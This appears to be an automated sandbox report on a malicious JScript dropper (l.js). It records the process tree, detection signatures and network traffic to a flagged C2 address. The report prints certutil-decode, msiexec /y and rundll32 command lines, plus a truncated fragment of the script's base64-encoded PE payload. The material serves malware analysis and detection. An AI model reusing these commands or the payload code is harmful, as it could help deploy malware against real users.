Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l.js

Overview

General Information

Sample name:l.js
Analysis ID:1596998
MD5:97835729c58cae6501e9b3a3776e9906
SHA1:63012f62e00a491b83adaba8804d890ac809490a
SHA256:a75cab3593ad35620817235a9bd7938c7adaa8b3ce12a2da20e3e145ac304346
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Found evasive API chain (may stop execution after checking mutex)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Uses certutil -decode
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Msiexec Execute Arbitrary DLL
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 980 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • certutil.exe (PID: 4480 cmdline: C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)
    • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 5672 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp MD5: E5DA170027542E25EDE42FC54C929077)
  • certutil.exe (PID: 5672 cmdline: C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)
    • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 3060 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp MD5: E5DA170027542E25EDE42FC54C929077)
  • rundll32.exe (PID: 2596 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", ProcessId: 980, ProcessName: wscript.exe
Sigma detected: Suspicious Msiexec Execute Arbitrary DLL
Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp, CommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\msiexec.exe, NewProcessName: C:\Windows\System32\msiexec.exe, OriginalFileName: C:\Windows\System32\msiexec.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp, ProcessId: 5672, ProcessName: msiexec.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js", ProcessId: 980, ProcessName: wscript.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-22T20:37:06.102276+010020287653Unknown Traffic192.168.2.450003149.248.58.85443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8179E FindFirstFileW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FindNextFileW,wcscmp,FindClose,11_2_68B8179E

Software Vulnerabilities

barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: l.jsArgument value : ['"Y q(1w,2G,2I){a o="";a i=0;UA(i<2I-1w.Uz().Uy){o=o+2G;i++}o=o+1w;2F(o)}Y 1t(t){a d,1v;d=q(t.Ux(),"0', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']
Source: l.jsArgument value : ['"Y q(1w,2G,2I){a o="";a i=0;UA(i<2I-1w.Uz().Uy){o=o+2G;i++}o=o+1w;2F(o)}Y 1t(t){a d,1v;d=q(t.Ux(),"0', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']
Source: l.jsArgument value : ['"Y q(1w,2G,2I){a o="";a i=0;UA(i<2I-1w.Uz().Uy){o=o+2G;i++}o=o+1w;2F(o)}Y 1t(t){a d,1v;d=q(t.Ux(),"0', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 149.248.58.85 443Jump to behavior
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50003 -> 149.248.58.85:443
Source: unknownTCP traffic detected without corresponding DNS query: 149.248.58.85
Source: unknownTCP traffic detected without corresponding DNS query: 149.248.58.85
Source: unknownTCP traffic detected without corresponding DNS query: 149.248.58.85
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B81DF0 InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,wcslen,wcslen,wcscpy,wcscat,SetLastError,HttpSendRequestW,InternetReadFile,LoadLibraryW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,11_2_68B81DF0
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.248.58.85/
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.248.58.85/Q
Source: rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.248.58.85/d
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Tasks\Whitefusion.jobJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B8830011_2_68B88300
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B81D4011_2_68B81D40
Source: l.jsInitial sample: Strings found which are bigger than 50
Source: rad64802.tmp.4.drStatic PE information: Number of sections : 11 > 10
Source: Updater.dll.10.drStatic PE information: Number of sections : 11 > 10
Source: classification engineClassification label: mal72.evad.winJS@8/4@0/1
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_68B87670 CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString,11_2_68B87670
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\3e4d7a5b-aa72-4d5f-8f8c-b292257af55c
Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\radEBB74.tmpJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js"
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mstask.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation

barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile(encoded_name);var t0='';t0=t0.concat('TVqQAAMAAAAEAAAA//8');t0=t0.concat('AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGh');t0=t0.concat('pcyBwcm9ncmFtIGNh');t0=t0.concat('bm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQ');t0=t0.concat('AAZIYLANqSiGEAAAAAAAAAAPAALiILA');t0=t0.concat('gIhAIQAAADSAAAADAAAUBMAAAAQAAAAALhoAAAAAAAQAAAAAg');t0=t0.concat('AABAAAAAAAAAAFAAIAAAAAAABwAQAABAAAle0AAAIAAA');t0=t0.concat('AAACAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAE');t0=t0.concat('AAAAAAAAAAAAAAQAAAAABABALgAAAAAIAEAkBAAAAAAAAAAAAAAAOA');t0=t0.concat('AAKAFAAAAAAAAAA');t0=t0.concat('AAAABgAQD0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgM4');t0=t0.concat('AACgAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAKCQBAIgDAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAALi');t0=t0.concat('DAAAAEAAAAIQAAAA');t0=t0.concat('EAAAAAAAAAAAAAAAAAABgAFBgLmRhdGEAAACwBAAAAKAAAAAGAAAA');t0=t0.concat('iAAAAAAAAAAAAAAAAAAAQABgwC5yZGF0YQAAkCEAAA');t0=t0.concat('CwAAAAIgAAAI4AAAAAAAAAAAAAAAAAA');t0=t0.concat('EAAYEAucGRhdGEAAKAFAAAA4AAAAAYAAACwAAAAAAAAAAA');t0=t0.concat('AAAAAAABAADBALnhkYXRhAADMBQAAAPAAAA');t0=t0.concat('AGAAAAtgAAAAAAAAAAAAAAAAAAQAAwQC5ic');t0=t0.concat('3MAAAAAUAsAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAYM');t0=t0.concat('AuZWRhdGEAALgAAAA');t0=t0.concat('AEAEAAAIAAAC8AAAAAAAAAAA');t0=t0.concat('AAAAAAABAADBALmlkYXRhAACQEAAAACABAAASAAAAvgAAAAAAAAAA');t0=t0.concat('AAAAAAAAQAAwwC5DUlQAAAAAWAAAAABAAQAAAgAAANAAAAA');t0=t0.concat('AAAAAAAAAAAAAAEAAQMAudGxzAAAA');t0=t0.concat('ABAAAAAAUAEAAAIA');t0=t0.concat('AADSAAAAAAAAAAAAAAAAAABAAEDALnJlbG9');t0=t0.concat('jAAD0AAAAAGABAAA');t0=t0.concat('CAAAA1AAAAAAAAAAAAAAAAAAAQAAwQgAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAEiNDfnvAADppIEAAA8fQABB');t0=t0.concat('VUFUVVdWU0iD7ChJicxNicWF');t0=t0.concat('0nV6ixXs7wAAMcCF0n5eg+oBSIsdlMAAAEUx5L8BAAAAiRXO7wAAS');t0=t0.concat('IstpxUBAOsMDx9EAAC56AMAAP/VTIng8EgPsTtIicZIhcB16UiLPW');t0=t0.concat('rAAACLB4P4Ag+E7wAAALkfAAAA6BWBAAC4AQAAAEiDxChbXl9dQ');t0=t0.concat('VxBXcMPHwCD+gEPha8AAABlSIsEJTAAAABIix0XwAAASItwCDH/');t0=t0.concat('SIstMhUBAOsYDx+EAAAAAABIOcYPhLcAAAC56AMA');t0=t0.concat('AP/VSIn48EgPsTNIhcB14zH/SIs16r8AAI');t0=t0.concat('sGg/gBD4TvAAAAiwaFwA+EpQAAAIsGg/gBD4S6AAAA');t0=t0.concat('hf8PhIIAAABIiwV7vwAASIsASIXAdA1Niei6AgAAAEyJ4f/QgwXX7');t0=t0.concat('gAAAbgBAAAASIPEKFte');t0=t0.concat('X11BXEFdww8fRAAAuAEAAABIg8Qo');t0=t0.concat('W15fXUFcQV3DZg8fRAAASI0Nie');t0=t0.concat('4AAOhEgQAAxwcAAAAASIczuAEAAADpAf/');t0=t0.concat('//5C/AQAAAOlV////Zg8fRA');t0=t0.concat('AAMcBIhwPpdP///2YPH0QAAEiLFWm/AABIiw1');t0=t0.concat('SvwAAxwYBAAAA6M9/AADpPf///2aQSIsVKb8');t
